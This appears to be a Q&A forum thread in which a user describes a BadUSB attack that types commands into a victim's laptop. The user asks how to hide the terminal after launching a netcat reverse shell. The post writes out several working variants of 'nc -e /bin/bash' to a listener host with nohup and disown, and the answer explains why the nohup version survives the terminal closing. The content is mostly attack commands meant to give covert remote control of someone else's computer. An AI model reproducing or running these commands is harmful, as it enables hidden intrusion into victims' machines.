0

SCENARIO: the attacker insert into a victim's laptop an USB which acts as a keyboard. The payload opens a terminal, executes a reverse shell and hides the terminal.

PROBLEM: the tests I did locally (ubuntu 19.04, and digispark as usb) are the following:

ONE

terminal A nc -e /bin/bash 10.10.10.10 8888

terminal B nc -vlp 8888

Everything works, I have my shell with the prompt on the terminal B but the terminal A is not hidden. Then it is useless in this case.

TWO

terminal A nc -e /bin/bash 10.10.10.10 8888&; disown; exit

terminal B nc -vlp 8888

terminal B just hangs and terminal A is hidden. Useless.

THREE

terminal A nohup nc -e /bin/bash 10.10.10.10 8888&; exit

terminal B nc -vlp 8888

terminal B just hangs and terminal A is hidden

FOUR

terminal A: I open screen then executenc -e /bin/bash 10.10.10.10 8888 , CTRL^A , then d and finally exit.

terminal B nc -vlp 8888

using screen everything works (terminal B receives a working shell and terminal A isn't visible) but I don't want to use screen because it is not installed by default.

QUESTION: is there a way (using preinstalled tools) to hidden the terminal without screen but with the same effect?

Maicake
  • 1,046
  • 10
  • 34

1 Answers1

0
nohup nc ...&; disown; exit

After the shell exits, the terminal will either logout or shutdown (depending on what kind of terminal it is), and send SIGHUP to the controlling process group, which would cause nc to exit.

Using nohup detaches from the terminal and runs nc in its own process group (so it will no longer be in the terminal's controlling process group), so the SIGHUP won't be sent to it.

Chris Dodd
  • 119,907
  • 13
  • 134
  • 226